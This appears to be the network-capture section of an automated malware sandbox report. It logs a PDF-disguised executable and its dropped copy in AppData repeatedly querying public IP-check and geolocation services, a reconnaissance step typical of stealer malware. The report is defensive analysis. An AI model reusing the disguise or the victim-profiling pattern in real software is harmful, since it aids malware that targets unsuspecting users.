                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.849727132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:18.693051100 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:19.559221983 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:19 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: e3e9fd988c734c8a9d8171fa11f5bd42
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.849730132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:20.903827906 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:21.771253109 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:21 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 5a37a7ce277eada53b3de25bfffbebf5
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.849731132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:20.904635906 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:21.776822090 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:21 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: a0780e7c86d88096c2f619f588fc4954
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.849734132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:22.541937113 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:23.404171944 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: b41d6902069e2c9f53bd63fbd072ba6a
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.849735132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:22.548870087 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:23.404201031 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: ac5f1481c89e5e6ed989cbda50193eba
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.849740132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:24.220299006 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:25.083581924 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 6697c00b9b1eeec50ec5f393133c01c0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.849741132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:24.269423008 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:25.158359051 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: c3b61d2404a707d46a2086305ea71dd3
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.849748132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:25.928317070 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:26.800252914 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 28a8c60bb6377b6ff62c7956091afde2
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.849750132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:27.575687885 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:28.658778906 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 6ab488b1161a9e6f7136463cd0a13f12
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                Oct 25, 2024 09:17:28.669812918 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 6ab488b1161a9e6f7136463cd0a13f12
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.849711188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:12 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:12 UTC890INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:12 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 308
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khsi9a6s%2BH0EtpYtiOW2xy7Ee47ZgPekC7rT0ALK6PJYTMLXHSTiB7Wcgmxz2G9jhu7oteWLY76haSXtcQT0Gt2C8aD5Cd5rgBMeGHFlGXto%2BSvzGJLui9PuXF2X4kLuxbID7Rjv"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806cf1795de712-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1425898&cwnd=247&unsent_bytes=0&cid=4082db39bb026eaa&ts=330&x=0"
                                                                                2024-10-25 07:17:12 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.849713188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:13 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:13 UTC892INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:13 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 309
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bOu2aox8NQwcIEaY1CzJGuBaL%2B86uTAPpCw79VKTERxhobTo55TRvI66c8leowIWJ4FRB7EwVd8RqyIPCo5eqMhTyIMzQjGS2Djc09fQ%2FYfXYQugWvA8vg0ZvW5gs84aOfcxT%2Fko"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806cf83ded3ac2-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=c6af47a9a7500c88&ts=157&x=0"
                                                                                2024-10-25 07:17:13 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.849717188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:15 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:15 UTC888INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:15 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 311
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUkPKcUuSxDudoV3vKTe2QcG6qNSsW2Q9a6xDvaZ7%2BdNSeKRWJChcjwbOK7Z3WGqsJtbyOb9Efsde54661qgV5lW0S6PqQeU2lsKPqpCVM6ooc5NjGCrw9rmRRRTekQnEbRgavWQ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d026ba5e776-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1044&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2696461&cwnd=249&unsent_bytes=0&cid=44b2d68427be880b&ts=147&x=0"
                                                                                2024-10-25 07:17:15 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.849718188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:15 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:15 UTC894INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:15 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 311
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jze%2BHBhFsOih24JdfDKqk32YHt1BIQuyzGCjvLpfdKvO6RAXeZewengvi2%2F9zscOwz81fWnNWw%2BzDKiFflsE57ChyGubB4Pfw5%2BdoXaXzDF2bxV2kpOvFqsH3hvfrNVSjKRWojaO"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d0438d3345e-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2167664&cwnd=251&unsent_bytes=0&cid=c5df08c43e83f54c&ts=251&x=0"
                                                                                2024-10-25 07:17:15 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.849720188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:16 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:16 UTC898INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:16 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 312
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0%2FiPniqzvtQig1n29TcdYn3Sq3%2FG%2BUWHja9q5PrJ4lCTLVMdHeSCbwh6%2BElEoutduC8nnr2HsHUBTaaNKb6MSZ%2FBp5YXavUMGXXUvYFDwr2oAlaxYbEuwIGkdA%2FPVKmON0SwfRW"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d0aab0f6b7d-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1303917&cwnd=215&unsent_bytes=0&cid=822ce8857e5b9e69&ts=146&x=0"
